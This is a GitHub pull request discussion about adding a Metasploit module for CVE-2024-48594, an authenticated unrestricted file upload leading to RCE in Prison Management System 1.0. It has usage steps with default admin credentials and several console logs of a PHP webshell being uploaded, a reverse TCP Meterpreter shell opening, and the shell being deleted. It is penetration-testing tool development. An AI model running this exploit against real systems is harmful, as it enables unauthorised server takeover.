Add Prison Management System 1.0 auth RCE (CVE-2024-48594)

[Xorriath]

This module exploits CVE-2024-48594, an authenticated unrestricted file upload vulnerability in Prison Management System 1.0. An authenticated admin user can upload a PHP webshell via the avatar field in add-admin.php, leading to remote code execution.

Verification

• Start msfconsole
• exploit/linux/http/prison_management_rce
• set RHOSTS <target_ip>
• set RPORT <target_port>
• set SSL true (if HTTPS)
• set USERNAME admin
• set PASSWORD admin123
• set LHOST <your_ip>
• run
• Verify meterpreter session opens as www-data
• Verify webshell gets cleaned up after exploitation

Example execution

msf exploit(linux/http/prison_management_rce) > options

Module options (exploit/linux/http/prison_management_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   admin123         yes       Password for authentication
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, socks5h, http
   RHOSTS     192.168.223.103  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      9443             yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to Prison Management System
   USERNAME   admin            yes       Username for authentication
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.45.222   yes       The listen address (an interface may be specified)
   LPORT  9443             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   PHP



View the full module info with the info, or info -d command.

msf exploit(linux/http/prison_management_rce) > run
[*] Started reverse TCP handler on 192.168.45.222:9443 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Prison Management System login page detected
[*] Attempting to authenticate as admin...
[+] Successfully authenticated!
[*] Uploading webshell as EXBCiWAs.php...
[+] Webshell uploaded to /uploadImage/Profile/EXBCiWAs.php
[*] Triggering payload execution...
[*] Sending stage (41224 bytes) to 192.168.223.103
[+] Deleted EXBCiWAs.php
[*] Meterpreter session 2 opened (192.168.45.222:9443 -> 192.168.223.103:48250) at 2025-12-26 07:15:02 +0200
meterpreter > getuid
Server username: www-data

Notes

• Tested on Prison Management System 1.0 on Ubuntu/Apache
• Vulnerable software: https://www.sourcecodester.com/php/17426/prison-management-system-using-php-and-mysql-source-code-free-download.html

[jvoisin]

How many active users does this project have?

[Xorriath]

@jvoisin Hello, thanks for taking a look at this. It is very difficult to tell how many active users there are currently. The software was made publicly available on April 6, 2024. Since then the page had nearly 11000 views. Of those views, there is no way to tell how many people installed the software and are currently using it in a commercial fashion.
https://www.sourcecodester.com/sql/17287/prison-management-system.html

If there are any other questions, please let me know.

[github-actions]

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

• Writing Module Documentation
• Template
• Examples

[msutovsky-r7]

Does the timeout here need to set to 5 second?

[Xorriath]

If my understanding is correct, when the uploaded .php file is requested, the response is going to "hang", but the command execution will be triggered, so we do not need the default 20 second timeout for a response that hangs.

[msutovsky-r7]

Hello @Xorriath, thanks for your contribution! Would you mind adding documentation for your module?

msf exploit(linux/http/prison_management_rce) > check
[*] 10.5.132.162:80 - The service is running, but could not be validated. Prison Management System login page detected
msf exploit(linux/http/prison_management_rce) > run verbose=true 
[*] Started reverse TCP handler on 192.168.3.7:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Prison Management System login page detected
[*] Attempting to authenticate as admin...
[*] Retrieved session cookie: PHPSESSID=uihgdhgbn1ot5a2mis55gccg3h;
[+] Successfully authenticated!
[*] Uploading webshell as cJEHEWno.php...
[+] Webshell uploaded to /uploadImage/Profile/cJEHEWno.php
[*] Triggering payload execution...
[*] Sending stage (41224 bytes) to 10.5.132.162
[+] Deleted cJEHEWno.php
[*] Meterpreter session 1 opened (192.168.3.7:4444 -> 10.5.132.162:33974) at 2026-01-06 10:06:21 +0100

meterpreter > sysinfo
Computer        : virt-ubuntu
OS              : Linux virt-ubuntu 6.8.0-1031-azure #36~22.04.1-Ubuntu SMP Tue Jul  1 03:54:01 UTC 2025 x86_64
Architecture    : x64
System Language : C
Meterpreter     : php/linux

[Xorriath]

Hello, thank you for the code tweaks suggestions and for testing the module. I have updated the PR with a new documentation commit and committed the code suggestions. Happy to add/tweak anything else if required :)

[msutovsky-r7]

msf exploit(linux/http/prison_management_rce) > run verbose=true 
[*] Started reverse TCP handler on 192.168.3.7:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Prison Management System login page detected
[*] Attempting to authenticate as admin...
[*] Retrieved session cookie: PHPSESSID=cpc6s59rps4jq8rrqk08830ioh;
[+] Successfully authenticated!
[*] Uploading webshell as JJwtOGph.php...
[+] Webshell uploaded to /uploadImage/Profile/JJwtOGph.php
[*] Triggering payload execution...
[*] Sending stage (41224 bytes) to 10.5.132.163
[+] Deleted JJwtOGph.php
[*] Meterpreter session 1 opened (192.168.3.7:4444 -> 10.5.132.163:48000) at 2026-01-07 13:24:43 +0100

meterpreter > sysinfo
Computer        : virt-ubuntu
OS              : Linux virt-ubuntu 6.8.0-1031-azure #36~22.04.1-Ubuntu SMP Tue Jul  1 03:54:01 UTC 2025 x86_64
Architecture    : x64
System Language : C
Meterpreter     : php/linux

[msutovsky-r7]

Release Notes

This adds a new module for Prison Management System 1.0 (CVE-2024-48594). The module requires admin credentials, which are subsequently used to exploit unrestricted file upload and upload a webshell.